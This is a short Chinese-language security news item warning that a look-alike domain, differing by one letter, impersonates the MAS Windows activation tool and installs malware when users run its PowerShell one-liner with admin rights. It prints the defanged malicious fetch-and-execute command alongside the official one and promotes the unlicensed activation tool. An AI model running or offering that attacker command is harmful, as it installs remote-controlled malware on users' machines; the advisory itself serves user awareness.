#安全资讯 有人伪造 / 冒充知名激活工具 MAS 并传播恶意软件，用户激活时最好每次从官网复制激活命令而非手动输入。黑客注册的域名与官方域名仅差字母 d，如果用户在输入时没有仔细检查就执行命令，虽然也能激活系统但也会被安装恶意软件。查看全文：https://ourl.co/111439

知名激活工具 MAS 提供 PowerShell 命令行可以快速在线加载激活脚本并执行激活操作，在线命令相较于下载工具还是非常方便的，但用户需要每次输入或粘贴对应的命令。

既然是在线下载那就存在域名，MAS 官方激活命令 (和使用的域名如下)：

irm https://get.activated.win | iex

现在有黑客注册非常类似的域名传播恶意软件：

irm hxxps://get.activate.win | iex

这个域名前后只差字母 d，部分用户在输入时就可能没有注意而执行了黑客伪造的版本，这个伪造的版本确实也可以激活系统 (毕竟 MAS 本身就是开源的)，但激活的同时也会在系统里安装恶意软件。

MAS 激活命令需要管理员权限，而在管理员权限下黑客安装恶意软件是没有任何阻拦的，所以执行命令后系统有可能会安装多个恶意软件并被远程控制。

MAS 团队提醒用户在执行命令前检查自己输入的命令，如有必要建议每次访问 MAS 官网并复制命令进行粘贴，当然也需要提防可能存在的假冒的 MAS 官网 (目前似乎还没有)。

激活工具官网：https://massgrave.dev/